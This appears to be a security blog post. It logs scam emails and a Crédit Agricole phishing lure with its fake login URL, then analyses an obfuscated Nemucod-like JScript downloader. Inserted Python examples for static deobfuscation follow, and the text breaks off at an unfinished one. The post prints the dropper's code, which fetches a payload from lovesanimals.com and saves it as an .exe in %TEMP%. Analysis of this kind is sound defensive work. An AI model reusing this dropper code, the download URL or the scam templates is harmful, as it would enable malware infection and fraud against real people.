Monday, May 9, 2016

Confirm receipts


Email analysis :

NOTE : attorneypl9094153@gmail.com

Elena Nana

WITH RESPECT FROM MISS ELENA. I am Elena Nana. My parents Mr. and Mrs. Jerry Nana were assassinated here in IVORY COAST. Before my father's death he had US$12.5M (TWELVE MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLARS) deposited in a bank here in Abidjan. I want you to do me a favour and receive these funds into a safe account in your country or any safer place as the beneficiary. I want to come over to your country for the safety of my life from the hands of these wicked assassins. I have plans to invest in your country, in real estate and industrial production. This is my reason for writing to you, and I am willing to offer you 20% of the total funds for assisting me. Please, if you are willing to assist me, reply to me with your direct phone number. Sincerely yours, Elena Nana

Email analysis :

NOTE : en1822085@gmail.com
NOTE : asarijopaul@yahoo.co.jp

From Money Gram Money Transfer

Attention My Dear,

Your first payment of $7000 is about to be sent today through Money Gram money transfer. You are advised to contact Mr. Wilson Robert with your full information, such as:

Your name......
Your country.....
Your phone number..
Your address......

To enable him to send your first payment of $7000 today. For more information contact Mr. Wilson Robert. Telephone number: +229 9855-6485 OR +229-9985-9256. Email (moneygram_transfer2@hotmail.com). He will keep sending your payment until your total fund of $3.700,000 USD is completed.

Best Regards
Mr.Karla Johnson

Email analysis :

NOTE : moneygram_transfer2@hotmail.com
NOTE : adoc-cper12.@viola.ocn.ne.jp
NOTE : X-Originating-Ip : [209.95.36.14]

From: Miss Sarah Bright

Dear One,

I am writing this letter with due respect and heartful of years, since we have not known or met each other previously.

My name is Miss Sarah Bright. I am the only daughter of the late Chief John Bright. My father was a preeminent oil and gas entrepreneur in West Africa before he died. He also had extensive investments in real estate, the agricultural and banking sectors. My mother died together with my siblings in a ghastly automobile accident along the Yamoussoukro expressway when I was barely 9 years old, and since then my father took me so special as his only child. I prayed before contacting you and I believed that you are the rightful person to help me out of my horrible situation. Please, I need your assistance to transfer my inherited money, 10.5 million American dollars, to your country for investment ventures under your care and directive, while I will continue my education in your country after the transfer. It is my desire to come over to your country to further my education while you invest and manage my inherited money. Please, I am an orphan and I need your assistance to transfer my inherited money to your country. I will also need your assistance to secure a nice school for me in your country, where I will continue my education. I am willing to offer you 20% of the total sum as compensation for your effort/input after the successful transfer of my inherited money into your nominated account. As soon as I receive your reply indicating your interest to assist me to transfer the money to your country, I will give you all the necessary information you may require to proceed towards transferring the money to your account, as I believe that this transaction would be concluded within a few days of you signifying your interest to assist me. Please, consider this and get back to me as soon as possible. Immediately I confirm your willingness, I will send you my picture and also give you more details about myself and the bank where my late father deposited the fund, so that you can reach the bank and confirm the existence of the fund as well, because seeing is believing.

Anticipating to hear from you urgently.

Thanks and God bless you.
Yours Sincerely,
Miss Sarah Bright

Email analysis :

NOTE : sarah1bright@yahoo.co.jp
NOTE : sarahbright@outlook.fr
NOTE : Sender : hiyoko19951122@yahoo.co.jp
NOTE : X-Mailer : YahooMailWebService/0.8.111_69
NOTE : Received : from [199.115.117.199]

Re: Affordable loan @ cheap interest rate


Do you need a loan to buy a car or pay off some bills and start up a new business? Contact us now for more details.

Email analysis :

NOTE : raihanah@pknm.gov.my
NOTE : wkohln@gmail.com
NOTE : X-Originating-Ip : [197.210.226.250]
NOTE : X-Mailer : Zimbra 8.0.5_GA_5839 (zclient/8.0.5_GA_5839)
NOTE : Received : from mail.pknm.gov.my (mail.pknm.gov.my [192.168.100.226]) by mail.pknm.gov.my (Postfix)


What is pknm.gov.my ?

Malacca State Development Corporation

Request for Genuine Investment Partnership

How are you? I hope you are well. Please accept my sincere apologies for writing to you privately without your consent. My name is Mrs. Rebecca Garang, wife of a prominent politician from Sudan, the late Dr. John Garang, the late Sudanese Vice President who died in a plane crash on 22nd July 2005 under suspicious circumstances. I want to solicit your cooperation on a business investment project on behalf of my family. Presently, there is a substantial amount of money that my family needs to move out of a country in Africa for profitable investment purposes, and we would really appreciate your help and cooperation. Hence, there is a lot to discuss and plan on the way forward, and I shall provide you with further details when I receive your positive response.

Kind regards,

Mrs. Rebecca Garang

For the Family

Email analysis :

NOTE : jeffery_garang@yahoo.com
NOTE : shipping@cheungyue.com.hk
NOTE : Received : from User (unknown [41.71.185.224]) by correo.dicta.hn (Postfix)

US Homeland Security Department Office.

I'm Jeh Charles Johnson, the Secretary of the U.S. Department of Homeland Security, Washington DC. Office Address: 3801 Nebraska Ave NW, Washington, DC 20016, United States. We received a report from ECOWAS that you have an abandoned fund worth USD 4.5 Million in West Africa. I have instructed ECOWAS and the concerned authorities to bring the consignment box to our Head Office in Washington DC. The fund will arrive mAAA # so that preparation can be made for the delivery of the consignment to your home address.

Email analysis :

NOTE : homelandsecu244@gmail.com
NOTE : HOME.@sand.ocn.ne.jp
NOTE : X-Originating-Ip : [41.86.238.31]

MR.MARKIND OMAR

UNITED NATION MONITORING FUND ACCRA GHANA WEST AFRICA OR DO YOU WANT US TO TALK ON PHONE I CAN SEND MY NUMBER TO YOU I AM MR. MARKIND OMAR THE DIRECTOR OF UNITED NATION MONITORING FUND IN ACCRA GHANA. WE ARE CONTACTING YOU IN REGARDS TO YOUR RECOVERED DELAYED FUND WORTH $10 MILLION AMERICAN DOLLARS FROM ONE OF THE LEADING BANKS HERE IN AFRICA THAT WAS ASSIGNED TO TRANSFER TO YOU AS THE REAL BENEFICIARY. THE UNITED NATION MONITORING DEPARTMENT HERE IN ACCRA GHANA IN WEST AFRICA HAS INTRUDED OVER THE RECOVERED FUND AND INSTRUCTED TO TRANSFER THE FUND TO YOUR DOORSTEP IN YOUR COUNTRY THROUGH DIPLOMATIC TRANSFER WITHIN 72 HOURS. YOU ARE HEREBY ADVISED TO FORWARD THE FOLLOWING INFORMATION TO ENABLE THE CONSIGNMENT TO BE REGISTERED IN YOUR NAME AND YOUR INFORMATION WITH THE UNITED NATION DIPLOMATIC DELIVERY VESSEL FOR EFFECTIVE DELIVERY TO YOU AS THE REAL BENEFICIARY. YOUR FULL NAME ............................................. 1,YOUR HOME OFFICE ADDRESS FOR DELIVER............... 2.YOUR PRIVATE MO

5 YOUR AGE ................................................................

YOU ARE ADVISED TO RETURN TO THIS OFFICE OF THE UNITED NATION MONITORING FUND FOR MORE INSTRUCTIONS ON HOW TO RECEIVE YOUR CLAIMED FUND, URGENT.
Please contact me at my private email address
(markind.omar22@gmail.com)

BEST REGARDS
Mr MARKIND OMAR
DIRECTOR UNITED NATION MONITORING FUND

Email analysis :

NOTE : carolinda.eze@gmail.com
NOTE : markind.omar22@gmail.com

Winner of the Coca Cola lottery

Dear sir,

This is to notify you that your name was picked from THIS SITE by the Coca Cola Company as one of the lucky winners of $2,000,000.00 USD in the (Coca Cola) Profile Award 2016, so you are advised to contact the (Coca Cola) Profile Award agent to receive your winning prize. Agent to contact: Mr. Confidence Roland, via email address

Below is the information needed

1. Full Name:
2. Address:
3. Sex:
4. Occupation:
5. Phone Number:
6. City
7. Country:
8. Age:
9. A Copy of Your ID card (attached)

Kindly contact the agent in charge of your winnings, Mr. Confidence Roland, through his email address, {gmail.com}
Once again,

CONGRATULATIONS

Email analysis :

NOTE : mascogold@gmail.com

New message available! (Crédit Agricole phishing)

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Dear Customer,
A Crédit Agricole advisor has sent you a message.
You can view it by logging in to your online customer account
with your username/password by clicking the link below:

Click HERE (Cliquez ICI) to access your account.

See you soon on the account management service.
Crédit Agricole

Phishing analysis :

CLICK : Cliquez ICI
OPEN : http://sf-g50-enligne.crdit-agricole.chaletbnb.com/sfsecure/enligne/
SCREENSHOT :


CLICK : CONFIRMER
REDIRECT : https://www.credit-agricole.fr/

Email analysis :

NOTE : pokleksa@aseame.onmicrosoft.com
NOTE : chounettte@hotmail.fr
NOTE : X-Originating-Ip : [81.193.66.163]

Virus Analysis (UNPACKED...)

In the last email, I obtained a virus similar to a Nemucod ransomware from the virus report...


Code analysis :

===================================
INIT
===================================

var PR_RDONLY = 0x01;
var PR_WRONLY = 0x02;
var PR_RDWR = 0x04;
var PR_CREATE_FILE = 0x08;
var PR_APPEND = 0x10;
var PR_TRUNCATE = 0x20;
var PR_SYNC = 0x40;
var PR_EXCL = 0x80;

GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

function hex_md5_stream(stream) {
var hasher = Components.classes["@mozilla.org/security/hash;1"]
.createInstance(Components.interfaces.nsICryptoHash);
hasher.init(hasher.MD5);
hasher.updateFromStream(stream, stream.available());
var hash = hasher.finish(false);
var ret = '';
for (var i = 0; i < hash.length; ++i) {
var hexChar = hash.charCodeAt(i).toString(16);
if (hexChar.length == 1) ret += '0';
ret += hexChar;
}
return ret;
}


===================================
FUNCTION PICK
===================================

function pick(){
for (var i = 0, l = arguments.length; i < l; i++){
if (arguments[i] != undefined) return arguments[i];
}
return null;
};


===================================
FUNCTION BASE64DECODE
===================================

this.decode = base64decode;
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
this.chars();
function base64decode( str ) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while(i < len) {
/* c1 */
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while(i < len && c1 == -1);
if(c1 == -1) break;

/* c2 */
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while(i < len && c2 == -1);
if(c2 == -1) break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while(i < len && c3 == -1);
if(c3 == -1) break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while(i < len && c4 == -1);
if(c4 == -1) break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
}


===================================
Calling Windows Script Host
===================================

try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

try{
if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
}catch(Eeed)
{

}


===================================
FUNCTION PARSECOLOR
===================================

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0;
do { color += parseInt(cols[i]).toColorPart() } while (++i<3);
} else {
if (this.slice(0,1) == '#') {
if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase();
if (this.length==7) color = this.toLowerCase();
}
}
return (color.length==7 ? color : (arguments[0] || this));
};


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

function hex_md5(s) {
var stream = Components.classes["@mozilla.org/io/string-input-stream;1"]
.createInstance(Components.interfaces.nsIStringInputStream);
stream.setData(s, s.length);
return hex_md5_stream(stream);
}


===================================
DATA
===================================

titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
if(thenDo){
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
var empty=Math.random();
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

var hoddor = "lovesanimals.c"+"om/09y8hb7v6y7g";
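
Added example, not code from the original post or from the sample: a static resolver in Python for the comma-operator string building seen from the INIT section onward (the daunt/provisionally trick, the BHpUk table, and the \u-encoded hoddor URL just above). JScript evaluates a parenthesised comma list to its last operand, so every filler list collapses to its final literal, and the "+" chains, \uXXXX escapes and the sample's own .provisionally() helper (substring(0,1)) can be folded without ever executing the script; identifiers and any other call are rejected rather than evaluated.

```python
# Added example, not code from the original post or from the sample: a static
# resolver for the comma-operator string building used from the INIT section on.
# JScript evaluates ("a","b","c") to its last operand, so each parenthesised
# word list collapses to its final literal; '+' chains and \uXXXX escapes are
# then folded the way the engine would, without executing anything.  Supported:
# string literals, parentheses, commas, '+', array brackets and the sample's own
# .provisionally() helper (substring(0,1)); identifiers and other calls are rejected.
import re

TOKEN_RE = re.compile(r'''\s+|"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|\.(\w+)\(\)|([+,()\[\]])''')

def unescape(lit):
    """Decode \\uXXXX and \\xXX escapes; any other backslash-char becomes the char."""
    return re.sub(r"\\(u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|.)",
                  lambda m: chr(int(m.group(1)[1:], 16)) if len(m.group(1)) > 1 else m.group(1),
                  lit)

def tokenize(src):
    tokens, pos = [], 0
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if m is None:
            raise ValueError("unsupported construct at %r" % src[pos:pos + 20])
        pos = m.end()
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if lit is not None:
            tokens.append(("str", unescape(lit)))
        elif m.group(3):
            tokens.append(("call", m.group(3)))
        elif m.group(4):
            tokens.append(("op", m.group(4)))
    return tokens

class Parser:
    """expr := term ('+' term)* ;  term := STR | '(' expr (',' expr)* ')' call*"""
    def __init__(self, src):
        self.toks, self.i = tokenize(src), 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, expected=None):
        tok = self.peek()
        if tok[0] is None or (expected is not None and tok != expected):
            raise ValueError("expected %r, got %r" % (expected, tok))
        self.i += 1
        return tok

    def expr(self):
        value = self.term()
        while self.peek() == ("op", "+"):
            self.take()
            value += self.term()
        return value

    def term(self):
        kind, val = self.take()
        if kind == "str":
            value = val
        elif (kind, val) == ("op", "("):
            value = self.expr()
            while self.peek() == ("op", ","):     # comma operator: only the last operand survives
                self.take()
                value = self.expr()
            self.take(("op", ")"))
        else:
            raise ValueError("unexpected token %r" % ((kind, val),))
        while self.peek()[0] == "call":            # postfix helper, e.g. (...).provisionally()
            if self.take()[1] != "provisionally":
                raise ValueError("unknown helper, refusing to evaluate it")
            value = value[:1]                      # String.prototype.provisionally == substring(0, 1)
        return value

    def array(self):
        self.take(("op", "["))
        items = [self.expr()]
        while self.peek() == ("op", ","):
            self.take()
            items.append(self.expr())
        self.take(("op", "]"))
        return items

def resolve(src, array=False):
    """Fold one string expression (or, with array=True, an array literal of them)."""
    p = Parser(src)
    value = p.array() if array else p.expr()
    if p.i != len(p.toks):
        raise ValueError("trailing tokens after expression")
    return value

DAUNT_SRC = '"f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"'  # copied from INIT
TITULAR_SRC = '(("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally()'  # copied from DATA
HODDOR_SRC = (r'"\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"'
              r'+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067"')  # copied from above
BHPUK_SRC = """["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",
("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",
""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%", ""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe", "R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),
"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",
("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")]"""  # copied from CONVERSION (UNPACKED)

if __name__ == "__main__":
    print(resolve(DAUNT_SRC), resolve(TITULAR_SRC), resolve(HODDOR_SRC), resolve(BHPUK_SRC, array=True))
```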

===================================
FUNCTION QUICKWITTED
===================================

function quickwitted(expulsion, proved) {
try {
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
if (empty > 0) {
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|separated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))
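
The packer stages above can be unpacked offline instead of being eval'd. This is an added Python re-implementation of the packer's replacement loop (example code written for this post, not the sample's code): each \w+ word of the payload is the index of a dictionary entry spelled in radix a, so one decoder with the radix as a parameter handles the e=String stage (a=9), the toString(a) stage (a=18) and the radix-62 stages alike; the two short stages are copied as its inputs.

```python
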